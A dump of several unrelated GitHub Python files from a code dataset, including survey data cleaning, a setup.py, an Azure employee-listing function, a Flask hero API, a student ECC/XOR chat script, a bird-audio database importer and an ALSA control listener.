[f\"data/composite_US/{item}_US_cohort.csv\" for item in years]\n data = US_utils.load_multiple_data(file_names)\n\n complete_case_vars = [\"housing_quality\", 'marital_status', 'yearly_energy', \"job_sec\",\n \"education_state\", 'region', \"age\"] # many of these\n # REMOVED: 
'job_sector', 'labour_state'\n\n data = complete_case_varlist(data, complete_case_vars)\n\n ## Need to do correction on some variables individually as they are only in the dataset in specific years\n # doing complete case without the year range taken into account removes the whole years data\n # make sure its int not float (need to convert NA to 0 for this to work)\n data = complete_case_custom_years(data, 'loneliness', years=[2017, 2018, 2019, 2020])\n #data['loneliness'] = pd.to_numeric(data['loneliness'], errors='coerce').fillna(1).astype('int')\n ## Now do same for neighbourhood_safety\n data = complete_case_custom_years(data, 'neighbourhood_safety', years=[2011, 2014, 2017])\n #data['neighbourhood_safety'] = pd.to_numeric(data['neighbourhood_safety'], errors='coerce').fillna(2).astype('int')\n # ncigs missing for wave 1 only\n data = complete_case_custom_years(data, 'ncigs', years=list(range(2013, 2020, 1)))\n #data['ncigs'] = pd.to_numeric(data['ncigs'], errors='coerce').fillna(0).astype('int')\n # Nutrition only present in 2014\n data = complete_case_custom_years(data, 'nutrition_quality', years=[2015, 2017, 2019])\n #data['nutrition_quality'] = pd.to_numeric(data['nutrition_quality'], errors='coerce').fillna((data['nutrition_quality']).mean()).astype('int')\n\n ########## TESTING ##########\n #data = data[~(data['time'].isin([2011, 2014, 2017]) & data['neighbourhood_safety'].isna())]\n ########## TESTING ##########\n\n\n drop_columns = ['financial_situation', # these are just SF12 MICE columns for now. see US_format_raw.py\n 'ghq_depression',\n 'scsf1',\n 'clinical_depression',\n 'ghq_happiness',\n 'phealth_limits_work',\n 'likely_move',\n 'newest_education_state',\n 'health_limits_social',\n 'future_financial_situation',\n 'behind_on_bills',\n 'mhealth_limits_work'] # some columns are used in analyses elsewhere such as MICE and not featured in the final model.\n # remove them here or as late as needed.\n data = data.drop(labels=drop_columns, axis=1)\n\n\n\n US_utils.save_multiple_files(data, years, \"data/complete_US/\", \"\")\n\n","repo_name":"Leeds-MRG/Minos","sub_path":"minos/data_generation/US_complete_case.py","file_name":"US_complete_case.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73110761127","text":"import os\nimport sys\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.install import install\n\n\n#\n# Metadata & Deps\n#\n\nPACKAGE_NAME = \"bytestring_splitter\"\nBASE_DIR = os.path.dirname(__file__)\n\nABOUT = dict()\nwith open(os.path.join(BASE_DIR, PACKAGE_NAME, \"__about__.py\")) as f:\n exec(f.read(), ABOUT)\n\n\nwith open(os.path.join(BASE_DIR, \"README.md\")) as f:\n long_description = f.read()\n\nwith open(os.path.join(BASE_DIR, \"requirements.txt\")) as f:\n INSTALL_REQUIRES = f.read().split('\\n')\n\nwith open(os.path.join(BASE_DIR, \"dev-requirements.txt\")) as f:\n TESTS_REQUIRE = f.read().split('\\n')\n\n\n#\n# Utility\n#\n\nclass VerifyVersionCommand(install):\n \"\"\"Custom command to verify that the git tag matches our version\"\"\"\n description = 'verify that the git tag matches our version'\n\n def run(self):\n tag = os.getenv('CIRCLE_TAG')\n if tag.startswith('v'):\n tag = tag[1:]\n\n version = ABOUT['__version__']\n if version.startswith('v'):\n version = version[1:]\n\n if tag != version:\n info = \"Git tag: {0} does not match the version of this app: {1}\".format(\n os.getenv('CIRCLE_TAG'), ABOUT['__version__']\n )\n 
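# editor note: exiting with a message string yields a non-zero status, so the CI job fails when tag and version disagree\n            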
sys.exit(info)\n\n\n#\n# Main\n#\n\nsetup(name=ABOUT['__title__'],\n url=ABOUT['__url__'],\n version=ABOUT['__version__'],\n author=ABOUT['__author__'],\n author_email=ABOUT['__email__'],\n description=ABOUT['__summary__'],\n license=ABOUT['__license__'],\n long_description=long_description,\n\n setup_requires=['pytest-runner'], # required for setup.py test\n tests_require=TESTS_REQUIRE,\n\n extras_require={\"testing\": TESTS_REQUIRE},\n install_requires=INSTALL_REQUIRES,\n\n packages=find_packages(exclude=[\"tests\"]),\n cmdclass={'verify': VerifyVersionCommand},\n\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: Implementation\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Topic :: Software Development :: Libraries :: Python Modules\"\n ]\n )\n","repo_name":"nucypher/bytestringSplitter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"15646039265","text":"import logging\nfrom helper_functions import check_permission, Responses, get_users_company_object, query_container, get_object_attr, get_tuple_string\nfrom helper_functions import UserDoesNotExistException, CompanyNotFoundException, ItemNotFoundException\n\nimport azure.functions as func\n\n# Denys\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function to get all users')\n \n try:\n requester_uuid = req.headers.get('X-Request-UUID')\n if not check_permission(requester_uuid):\n return Responses.no_permissions()\n\n company_obj = get_users_company_object(requester_uuid)\n employee_ids = company_obj['employees']\n \n for employee_id in employee_ids:\n try:\n if get_object_attr(employee_id, 'company_id', 'employee_container') != company_obj['id']:\n return Responses.internal_server_error(f\"database inconsistency with user: '{employee_id}'\")\n \n except ItemNotFoundException:\n return Responses.user_not_found(employee_id)\n \n logging.error(\"1\")\n query = f\"SELECT * FROM employee e WHERE e.id IN {get_tuple_string(employee_ids)}\"\n logging.error(\"query: \" + query)\n # params = [{ \"name\":\"@ids\", \"value\": + \")\" }\n employee_objects = query_container(query, None, 'employee_container', filter=False)\n\n return Responses.success_dict({ \"employees\": employee_objects })\n \n except UserDoesNotExistException:\n return Responses.user_not_found(requester_uuid)\n\n except CompanyNotFoundException:\n return Responses.item_not_found(\"user's company\")\n","repo_name":"DanielElmar/3207-Cloud-Application-Development","sub_path":"groupCoursework/backend/all_users/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10632643230","text":"# sender\n\nimport os\nimport tinyec.ec as ec\nimport tinyec.registry as reg\nimport secrets\nimport hashlib\n\ndef textToBin(message):\n\n message = list(message)\n messageStr = \"\"\n\n for i in range(len(message)):\n message[i] = f\"{format(ord(message[i]), 'b'):0>8}\"\n \n for i in range(len(message)):\n messageStr += message[i]\n\n return messageStr\n\ndef xor(m, k):\n\n m = list(m)\n k = list(k)\n\n c = []\n cStr = \"\"\n\n for i in range(len(m)):\n xor = str(int(m[i]) ^ int(k[i]))\n 
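# editor note: assumes m and k are equal-length bit strings; each XORed bit is collected as a '0'/'1' character\n        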
c.append(xor)\n \n for i in range(len(c)):\n cStr += c[i]\n\n return cStr\n\ndef listToStr(list):\n\n str = \"\"\n for i in range(len(list)):\n str += list[i]\n\n return str\n\ncurve = reg.get_curve('secp256r1')\ngenerator = curve.g\norder = curve.field.n\nr = secrets.SystemRandom()\nalpha = r.randrange(1, order) \n\nalphaG = alpha * generator\n\ninput(\"\\n Press 'Enter' to start the public key exchange\")\nf = open(\"message.txt\", \"w\")\nf.write(str(alphaG.x) + \" \" + str(alphaG.y))\nf.close()\n\n\ninput(\"\\n Once Bob has also started the public key exchange, press 'Enter'\")\nf = open(\"message.txt\", \"r\")\nmsg_rcv = f.read()\nf.close()\nos.remove(\"message.txt\")\nprint(\"\\n The inital key has now been generated\")\n\na = \"\"\nb = \"\"\n\nfor i in range(len(msg_rcv)):\n if msg_rcv[i] == \" \":\n break\n else:\n a = a + msg_rcv[i]\n\nfor i in range(len(msg_rcv)):\n if i > (len(a)):\n b = b + msg_rcv[i]\n\nbetaG = ec.Point(curve, int(a), int(b))\nabg = alpha * betaG\n\ninput(\"\\n Press 'Enter' to send a message to Bob\")\nmsg = input(\"Message: \")\nf = open(\"message.txt\", \"w\")\n\nhash1 = hashlib.sha256()\nhash1.update(abg.x.to_bytes(32, \"big\"))\nhash1.update(abg.y.to_bytes(32, \"big\"))\nkey1 = format(int(hash1.hexdigest(), 16), 'b')\n\nkeyList = list(key1)\nkeyLen = int(len(keyList) / 2)\n\nr = []\ns = []\n\nfor i in range(len(keyList)):\n if i < keyLen:\n r.append(keyList[i])\n else:\n s.append(keyList[i])\n\ngammaG = (int(listToStr(r)) * int(listToStr(s))) * generator\n\nhash2 = hashlib.sha256()\nhash2.update(gammaG.x.to_bytes(32, \"big\"))\nhash2.update(gammaG.y.to_bytes(32, \"big\"))\nkey2 = format(int(hash1.hexdigest(), 16), 'b')\n\nkeyFinal = key1 + key2\n\nencMsg = xor(textToBin(msg), keyFinal)\n\nprint(\"\\n The resulting ciphertext is: \" + encMsg)\nprint(\"\\n The final key is: \" + keyFinal)\n\n\nf.write(encMsg)\nf.close() ","repo_name":"cws83/secureChatChannel","sub_path":"Alice.py","file_name":"Alice.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29582948202","text":"from contextlib import contextmanager # noqa\n\ntry:\n from greenlet import getcurrent as get_ident\nexcept ImportError:\n try:\n from six.moves._thread import get_ident\n except ImportError:\n from _thread import get_ident\n\n__all__ = [\"local\", \"Local\", \"get_ident\"]\n\n\n\"\"\"Thread-local/Greenlet-local objects\nThread-local/Greenlet-local objects support the management of\nthread-local/greenlet-local data. 
If you have data that you want\nto be local to a thread/greenlet, simply create a\nthread-local/greenlet-local object and use its attributes:\n >>> mydata = Local()\n >>> mydata.number = 42\n >>> mydata.number\n 42\n >>> hasattr(mydata, 'number')\n True\n >>> hasattr(mydata, 'username')\n False\n Reference :\n from threading import local\n\"\"\"\n\n\nclass Localbase(object):\n\n __slots__ = (\"__storage__\", \"__ident_func__\")\n\n def __new__(cls, *args, **kwargs):\n self = object.__new__(cls, *args, **kwargs)\n object.__setattr__(self, \"__storage__\", {})\n object.__setattr__(self, \"__ident_func__\", get_ident)\n return self\n\n\nclass Local(Localbase):\n def __iter__(self):\n ident = self.__ident_func__()\n try:\n return iter(list(self.__storage__[ident].items()))\n except KeyError:\n return iter([])\n\n def __release_local__(self):\n self.__storage__.pop(self.__ident_func__(), None)\n\n def __getattr__(self, name):\n ident = self.__ident_func__()\n try:\n return self.__storage__[ident][name]\n except KeyError:\n raise AttributeError(name)\n\n def __setattr__(self, name, value):\n if name in (\"__storage__\", \"__ident_func__\"):\n raise AttributeError(\"{!r} object attribute '{}' is read-only\".format(self.__class__.__name__, name))\n\n ident = self.__ident_func__()\n storage = self.__storage__\n if ident not in storage:\n storage[ident] = dict()\n storage[ident][name] = value\n\n def __delattr__(self, name):\n if name in (\"__storage__\", \"__ident_func__\"):\n raise AttributeError(\"{!r} object attribute '{}' is read-only\".format(self.__class__.__name__, name))\n\n ident = self.__ident_func__()\n try:\n del self.__storage__[ident][name]\n if len(self.__storage__[ident]) == 0:\n self.__release_local__()\n except KeyError:\n raise AttributeError(name)\n\n def clear(self):\n self.__release_local__()\n\n\nlocal = Local()\n\n\n@contextmanager\ndef with_request_local():\n local_vars = {}\n for k in [\"operator\", \"username\", \"current_request\"]:\n if hasattr(local, k):\n local_vars[k] = getattr(local, k)\n delattr(local, k)\n\n try:\n yield local\n finally:\n for k, v in list(local_vars.items()):\n setattr(local, k, v)\n\n\n@contextmanager\ndef with_client_user(username):\n with with_request_local() as local:\n local.username = username\n yield\n\n\n@contextmanager\ndef with_client_operator(update_user):\n with with_request_local() as local:\n local.operator = update_user\n yield\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_extract/handlers/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"28703783508","text":"from flask import Blueprint, request, jsonify\nfrom marvel_heroes.helpers import token_required\nfrom marvel_heroes.models import db, User, Hero, hero_schema, heroes_schema\n\napi = Blueprint('api', __name__, url_prefix='/api')\n\n@api.route('/getdata')\ndef getData():\n return {'some_hero': 'snapped', 'another_hero': 'unsnapped'}\n\n@api.route('/heroes', methods = ['POST'])\n@token_required\ndef createHero(current_user_token):\n name = request.json['name']\n alter_ego = request.json['alter_ego']\n description = request.json['description']\n comics_appeared_in = request.json['comics_appeared_in']\n super_power = request.json['super_power']\n owner_token = current_user_token.token\n\n hero = Hero(name, alter_ego, description, comics_appeared_in, super_power, owner_token = owner_token)\n\n db.session.add(hero)\n 
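# persist the new hero row before it is serialized into the response\n    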
db.session.commit()\n\n    response = hero_schema.dump(hero)\n    return jsonify(response)\n\n@api.route('/heroes', methods = ['GET'])\n@token_required\ndef getHeroes(current_user_token):\n    owner = current_user_token.token\n    heroes = Hero.query.filter_by(owner_token = owner).all()\n    response = heroes_schema.dump(heroes)\n    return jsonify(response)\n\n@api.route('/heroes/<id>', methods = ['GET'])\n@token_required\ndef getHero(current_user_token, id):\n    hero = Hero.query.get(id)\n    response = hero_schema.dump(hero)\n    return jsonify(response)\n\n@api.route('/heroes/<id>', methods = ['POST'])\n@token_required\ndef updateHero(current_user_token, id):\n    hero = Hero.query.get(id)\n    if hero:\n        hero.name = request.json['name']\n        hero.alter_ego = request.json['alter_ego']\n        hero.description = request.json['description']\n        hero.comics_appeared_in = request.json['comics_appeared_in']\n        hero.super_power = request.json['super_power']\n        hero.owner_token = current_user_token.token\n        response = hero_schema.dump(hero)\n        return jsonify(response)\n    else:\n        return jsonify({'Error': \"Sorry. That hero isn't here yet.\"})\n\n@api.route('/heroes/<id>', methods = ['DELETE'])\n@token_required\ndef snapHero(current_user_token, id):\n    hero = Hero.query.get(id)\n    if hero:\n        db.session.delete(hero)\n        db.session.commit()\n        response = hero_schema.dump(hero)\n        return jsonify(response)\n    else:\n        return jsonify({'Error': \"Sorry. That hero isn't here yet.\"})","repo_name":"mikehkaiser/marvle-api","sub_path":"marvel_heroes/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9444244372","text":"# encoding:utf-8\n\nfrom shapely.geometry import Polygon\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\npolygon = Polygon([(0,0),(1, 1), (1, 0)])\n\n\n\ndef plot_examples(colormaps):\n    \"\"\"\n    Helper function to plot data with associated colormap.\n    \"\"\"\n    np.random.seed(19680801)\n    data = np.random.randn(30, 30)\n    n = len(colormaps)\n    fig, axs = plt.subplots(1, n, figsize=(n * 2 + 2, 3),\n                            constrained_layout=True, squeeze=False)\n    for [ax, cmap] in zip(axs.flat, colormaps):\n        psm = ax.pcolormesh(data, cmap=cmap, rasterized=True, vmin=-4, vmax=4)\n        fig.colorbar(psm, ax=ax)\n    plt.show()\n    os.system(\"pause\")\n\n\ncmap = ListedColormap([\"darkorange\", \"gold\", \"lawngreen\", \"lightseagreen\"])\nplot_examples([cmap])","repo_name":"Qingping-Liu/_Groundwater_Drought","sub_path":"测试shapely.py","file_name":"测试shapely.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18975320565","text":"from pathlib import Path\nfrom typing import Collection, Dict, List\nfrom math import ceil, modf\nfrom mysql.connector import MySQLConnection\nfrom datetime import date, timedelta\nfrom mysql.connector.cursor import MySQLCursor\nfrom tools.logging import debug, info, error\nfrom tools.db.queries import get_id_of_entry_in_table\nfrom tools.file_handling.collect import rename_and_copy_to\nfrom datetime import datetime\nfrom tools.file_handling.name import parse_filename_for_location_date_time\nfrom tools.file_handling.audio import read_parameters_from_audio_file\nfrom tools.configuration import parse_config, DatabaseConfig\nfrom typedconfig.source import IniStringConfigSource\nfrom tools.sub_scripts.record_information import 
check_get_ids_from_record_informations\nfrom tools.file_handling.annotation import read_raven_file\nfrom tools.db import (\n get_entry_id_or_create_it,\n connectToDB,\n delete_from_table,\n sanitize_name,\n sanitize_altitude,\n)\nfrom tools.TSA_Species_Translator import TSA_Species_Translator\n\nfrom tools.logging import info\nimport argparse\n\n\nclass TSADB:\n classId = 0\n className = 1\n fileName = 2\n collection = 3\n soundType = 4\n duration = 5\n recordist = 6\n country = 7\n locality = 8\n elevation = 9\n date = 10\n time = 11\n quality = 12\n backgroundSpecies = 13\n srcFileName = 14\n remarks = 15\n created = 16\n modified = 17\n dbId = 17\n\n\ndb = TSADB()\n\n\nCONFIG_FILE_PATH = Path(\"config.cfg\")\n\nTSA_CONFIG = \"\"\"\n[database]\nuser = root\nhost = localhost\nport = 3306\npassword = pass2root\nname = tsa_data\nfile_storage_path = /tmp/\n\"\"\"\ntsaConfig = DatabaseConfig()\ntsaConfig.add_source(IniStringConfigSource(TSA_CONFIG))\n\nDATA_PATH = Path(\"/mnt/z/AG/TSA/Mario/_Backups/TsaOrgTrainAudioData/\")\nTEST_RUN = True\n# CollectionName, SubFolders,\nCOLLECTIONS = [\n (\"TsaShorts\", \"ShortsAll\", False),\n # (\"CD014\", \"VogelCDs\", False),\n # (\"CD043\", \"VogelCDs\", False),\n # (\"CD041\", \"VogelCDs\", False),\n # (\"CD058\", \"VogelCDs\", False),\n # (\"CD124\", \"VogelCDs\", False),\n # (\"CD126\", \"VogelCDs\", False),\n # (\"CD127\", \"VogelCDs\", False),\n # (\"CD901\", \"VogelCDs\", False),\n # (\"CD097\", \"VogelCDs\", False),\n # (\"CD123\", \"VogelCDs\", False),\n # (\"CD001\", \"VogelCDs\", False),\n # (\"CD002\", \"VogelCDs\", False),\n # (\"CD003\", \"VogelCDs\", False),\n # (\"CD004\", \"VogelCDs\", False),\n # (\"Nachtigall01\", \"Nachtigall01\", False),\n # (\"TsaJorn\", \"TsaJorn\", False),\n # (\"RefSys\", \"RefSys\", False),\n]\n\n\ndef import_data(data_path=DATA_PATH, config_file_path=CONFIG_FILE_PATH) -> List[str]:\n config = parse_config(config_file_path)\n\n info(\"Load Data from database\")\n failed_species_labels = {}\n with connectToDB(tsaConfig) as db_connection_tsa, connectToDB(\n config.database\n ) as db_connection_la:\n with db_connection_tsa.cursor(buffered=True) as db_cursor_tsa:\n with db_connection_la.cursor(buffered=True) as db_cursor_la:\n species_translator = TSA_Species_Translator(db_cursor_la)\n for collection in COLLECTIONS:\n info(\"Import collection {}\".format(collection))\n collection_entry = [\n (\"name\", collection[0]),\n (\"remarks\", None),\n ]\n collection_id = get_entry_id_or_create_it(\n db_cursor_la, \"collection\", collection_entry, collection_entry\n )\n\n labels = do_collection_data_import(\n db_connection_la,\n db_cursor_tsa,\n db_cursor_la,\n collection[0],\n collection_id,\n collection[1],\n collection[2],\n config.database.get_originals_files_path(),\n failed_species_labels,\n species_translator,\n data_path,\n )\n info(failed_species_labels)\n\n\ndef do_collection_data_import(\n db_connection_la: MySQLConnection,\n db_cursor_tsa: MySQLCursor,\n db_cursor_la: MySQLCursor,\n collection: str,\n collection_id: int,\n collection_path: str,\n use_src_filename: bool,\n orginal_path: Path,\n failed_species_labels,\n species_translator: TSA_Species_Translator,\n data_path: Path,\n):\n db_cursor_tsa.execute(\n \"\"\"SELECT \n t1.Date, /* 0 */\n t1.Time, /* 1 */ \n t1.Duration, /* 2 */ \n t1.SrcFileName, /* 3 */ \n t1.Recordist, /* 4 */ \n t1.Country, /* 5 */ \n t1.Locality, /* 6 */ \n t1.Latitude, /* 7 */ \n t1.Longitude, /* 8 */ \n t1.Elevation, /* 9 */\n t1.Quality, /* 10 */\n t1.FileName, /* 11 */\n 
t1.ClassName, /* 12 */\n t1.SoundType, /* 13 */\n t2.English_Name /*14*/\n FROM train_europe_v02 as t1\n LEFT JOIN system as t2 on t1.ClassName = t2.Artname\n WHERE Collection = %s\"\"\",\n (collection,),\n )\n failed_annotations = []\n count = db_cursor_tsa.rowcount\n data = db_cursor_tsa.fetchall()\n i = 0\n for row in data:\n if i % 100 == 0:\n info(\"imported {}/{}\".format(i, count))\n i = i + 1\n\n if use_src_filename:\n audio_filepath = data_path.joinpath(collection_path).joinpath(row[3])\n else:\n audio_filepath = data_path.joinpath(collection_path).joinpath(\n row[11] + \".wav\"\n )\n\n if audio_filepath.exists() is False:\n error(\"File does not exhist {}\".format(audio_filepath.as_posix()))\n continue\n\n audio_file_parameters = None\n try:\n audio_file_parameters = read_parameters_from_audio_file(audio_filepath)\n except:\n error(\"Could not read audio Parameters from {}\".format(audio_filepath))\n continue\n target_record_file_path = \"{}/{}/{}\".format(\n audio_file_parameters.md5sum[0],\n audio_file_parameters.md5sum[1],\n audio_file_parameters.md5sum[2],\n )\n person_entry = [(\"name\", sanitize_name(row[4], 128))]\n person_id = get_entry_id_or_create_it(\n db_cursor_la, \"person\", person_entry, person_entry\n )\n location_entry = [\n (\"name\", sanitize_name(\"{} {}\".format(row[5], row[6]), 256)),\n (\"description\", None),\n (\"habitat\", None),\n (\"lat\", row[7]),\n (\"lng\", row[8]),\n (\"altitude\", row[9]),\n (\"remarks\", None),\n ]\n # print(location_entry)\n location_id = get_entry_id_or_create_it(\n db_cursor_la,\n \"location\",\n [\n (\"name\", location_entry[0][1]),\n (\"description\", None),\n (\"habitat\", None),\n (\"remarks\", None),\n ],\n location_entry,\n )\n\n time = None\n end = None\n\n if row[1] is not None and row[0] is not None:\n timestamp = datetime.combine(row[0], datetime.min.time()) + row[1]\n time = timestamp.time()\n end = timestamp + timedelta(seconds=ceil(row[2]))\n\n record_data = [\n (\"date\", row[0]),\n (\"time\", time),\n #(\"end\", end,),\n (\"duration\", row[2],),\n (\"sample_rate\", audio_file_parameters.sample_rate),\n (\"bit_depth\", audio_file_parameters.bit_depth),\n (\"bit_rate\", audio_file_parameters.bit_rate),\n (\"channels\", audio_file_parameters.channels),\n (\"mime_type\", audio_file_parameters.mime_type),\n (\"original_filename\", audio_file_parameters.original_filename),\n (\"filename\", audio_file_parameters.filename),\n (\"file_path\", target_record_file_path),\n (\"md5sum\", audio_file_parameters.md5sum),\n (\"location_id\", location_id),\n (\"recordist_id\", person_id),\n (\"equipment_id\", None),\n (\"collection_id\", collection_id),\n (\"license\", None),\n ]\n (record_id, created) = get_entry_id_or_create_it(\n db_cursor_la,\n \"record\",\n [(\"md5sum\", audio_file_parameters.md5sum)],\n data=record_data,\n info=True,\n )\n if TEST_RUN is False:\n db_connection_la.commit()\n if created:\n targetDirectory = orginal_path.joinpath(target_record_file_path)\n targetDirectory.mkdir(parents=True, exist_ok=True)\n rename_and_copy_to(\n audio_filepath, targetDirectory, audio_file_parameters.filename,\n )\n\n # remove all old annotations\n delete_from_table(\n db_cursor_la, \"annotation_of_species\", [(\"record_id\", record_id)]\n )\n print(\"File Copyied {}\".format(audio_file_parameters.filename))\n db_connection_la.commit()\n\n species_id = species_translator.get_species_id(db_cursor_la, row[12], row[14])\n if species_id is None:\n failed_annotations.append(row[12])\n info(\"Missing species {}\", (row[12]))\n 
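            # no match in the species table: skip this row; the failed label is reported after the loop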
continue\n\n        annotation_data = [\n            (\"record_id\", record_id),\n            (\"species_id\", species_id),\n            (\"individual_id\", None),\n            (\"group_id\", None),\n            (\"vocalization_type\", None),\n            (\"quality_tag\", row[10]),\n            (\"id_level\", 1),\n            (\"channel_ix\", audio_file_parameters.channels),\n            (\"start_time\", 0),\n            (\"end_time\", row[2]),\n            (\"start_frequency\", None),\n            (\"end_frequency\", None),\n            (\"annotator_id\", person_id),\n        ]\n\n        get_entry_id_or_create_it(\n            db_cursor_la,\n            \"annotation_of_species\",\n            query=annotation_data,\n            data=annotation_data,\n        )\n        if TEST_RUN is False:\n            db_connection_la.commit()\n\n    # collect the distinct species labels that could not be matched\n    failed_species_labels.update(dict.fromkeys(failed_annotations))\n\n    info(\"Failed annotations not matched species {}\".format(len(failed_annotations)))\n    # # read_raven_file(corresponding_files.annoation_file)\n\n    return failed_species_labels\n\n\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument(\n    \"--data\",\n    metavar=\"path\",\n    type=Path,\n    nargs=\"?\",\n    help=\"target folder\",\n    default=DATA_PATH,\n)\nparser.add_argument(\n    \"--config\",\n    metavar=\"path\",\n    type=Path,\n    nargs=\"?\",\n    default=CONFIG_FILE_PATH,\n    help=\"config file with database credentials\",\n)\nargs = parser.parse_args()\nif __name__ == \"__main__\":\n    import_data(args.data, args.config)\n","repo_name":"hdogan84/database","sub_path":"src/import_scripts/import_annoations_tsa.py","file_name":"import_annoations_tsa.py","file_ext":"py","file_size_in_byte":10783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17762657802","text":"from pyalsa import alsahcontrol\nimport sys\nimport time\nimport select\nimport threading\n\nLOOPBACK_ACTIVE = \"PCM Slave Active\"\nLOOPBACK_CHANNELS = \"PCM Slave Channels\"\nLOOPBACK_FORMAT = \"PCM Slave Format\"\nLOOPBACK_RATE = \"PCM Slave Rate\"\nLOOPBACK_VOLUME = \"PCM Playback Volume\"\nGADGET_PB_RATE = \"Playback Rate\"\nGADGET_CAP_RATE = \"Capture Rate\"\n\nINTERFACE_PCM = alsahcontrol.interface_id[\"PCM\"]\nINTERFACE_MIXER = alsahcontrol.interface_id['MIXER']\nEVENT_VALUE = alsahcontrol.event_mask[\"VALUE\"]\nEVENT_INFO = alsahcontrol.event_mask[\"INFO\"]\nEVENT_REMOVE = alsahcontrol.event_mask_remove\n\n\nclass ControlListener:\n    def __init__(self, device):\n        self.get_card_device_subdevice(device)\n        self.hctl = alsahcontrol.HControl(\n            self._card, mode=alsahcontrol.open_mode[\"NONBLOCK\"]\n        )\n\n        self.elements = self.hctl.list()\n\n        self._active = self.find_element(LOOPBACK_ACTIVE, INTERFACE_PCM)\n        self._channels = self.find_element(LOOPBACK_CHANNELS, INTERFACE_PCM)\n        self._format = self.find_element(LOOPBACK_FORMAT, INTERFACE_PCM)\n        self._rate = self.find_element(LOOPBACK_RATE, INTERFACE_PCM)\n        if self._rate is None:\n            self._rate = self.find_element(GADGET_CAP_RATE, INTERFACE_PCM)\n\n        self._volume = self.find_element(LOOPBACK_VOLUME, INTERFACE_MIXER, device=0, subdevice=0)\n\n        self._active_elem = None\n        self._channels_elem = None\n        self._format_elem = None\n        self._rate_elem = None\n        self._volume_elem = None\n\n        if self._active is not None:\n            self._active_elem = alsahcontrol.Element(self.hctl, self._active)\n            self._active_elem.set_callback(self)\n        if self._channels is not None:\n            self._channels_elem = alsahcontrol.Element(self.hctl, self._channels)\n            self._channels_elem.set_callback(self)\n        if self._format is not None:\n            self._format_elem = alsahcontrol.Element(self.hctl, self._format)\n            self._format_elem.set_callback(self)\n        if self._rate is not None:\n            self._rate_elem = 
alsahcontrol.Element(self.hctl, self._rate)\n self._rate_elem.set_callback(self)\n if self._volume is not None:\n self._volume_elem = alsahcontrol.Element(self.hctl, self._volume)\n self._volume_elem.set_callback(self)\n\n self._active_events = []\n self._channels_events = []\n self._format_events = []\n self._rate_events = []\n self._volume_events = []\n self._new_events = False\n self._active = True\n\n self.poller = select.poll()\n for fd in self.hctl.poll_fds:\n self.poller.register(fd[0], fd[1])\n\n def get_card_device_subdevice(self, dev):\n parts = dev.split(\",\")\n if len(parts) >= 3:\n self.subdev_nbr = int(parts[2])\n else:\n self.subdev_nbr = 0\n if len(parts) >= 2:\n self.device_nbr = int(parts[1])\n else:\n self.device_nbr = 0\n self._card = parts[0]\n\n def find_element(self, wanted_name, interface, device=None, subdevice=None):\n if device is None:\n device=self.device_nbr\n if subdevice is None:\n subdevice=self.subdev_nbr\n found = None\n for idx, iface, dev, subdev, name, _ in self.elements:\n print(\"search\", idx, dev, subdev, name)\n if (\n name == wanted_name\n and dev == device\n and subdev == subdevice\n and iface == interface\n ):\n found = idx\n print(f\"Found control '{wanted_name}' with index {idx}\")\n break\n return found\n\n def read_value(self, elem):\n if elem is None:\n return None\n info = alsahcontrol.Info(elem)\n val = alsahcontrol.Value(elem)\n values = val.get_tuple(info.type, info.count)\n val.set_tuple(info.type, values)\n val.read()\n return values[0]\n\n def callback(self, el, mask):\n if mask == EVENT_REMOVE:\n self._active = False\n elif mask & EVENT_INFO:\n info = alsahcontrol.Info(el)\n if info.is_inactive:\n self._active = False\n elif mask & EVENT_VALUE:\n val = self.read_value(el)\n self._new_events = True\n if el.numid == self._active:\n self._active_events.append(val)\n elif el.numid == self._channels:\n self._channels_events.append(val)\n elif el.numid == self._format:\n self._format_events.append(val)\n elif el.numid == self._rate:\n self._rate_events.append(val)\n\n def read_all(self):\n print(\"--- Current values ---\")\n print(\"Active:\", self.read_value(self._active_elem))\n print(\"Rate:\", self.read_value(self._rate_elem))\n print(\"Channels:\", self.read_value(self._channels_elem))\n print(\"Format:\", self.read_value(self._format_elem))\n print(\"Volume:\", self.read_value(self._volume_elem))\n\n def pollingloop(self):\n while True:\n time.sleep(0.001)\n pollres = self.poller.poll()\n print(pollres)\n if pollres:\n print(\"triggered\")\n self.hctl.handle_events()\n\n def run(self):\n th = threading.Thread(target=self.pollingloop, daemon=True)\n th.start()\n while True:\n time.sleep(0.1)\n if self._new_events:\n self.read_all()\n self._new_events = False\n # print(\"loop\", self._active_events, self._rate_events, self._format_events, self._channels_events)\n\n\nif __name__ == \"__main__\":\n listener = ControlListener(\"hw:Loopback,1,0\")\n listener.run()\n","repo_name":"HEnquist/camilladsp-controller","sub_path":"pyalsa_class.py","file_name":"pyalsa_class.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 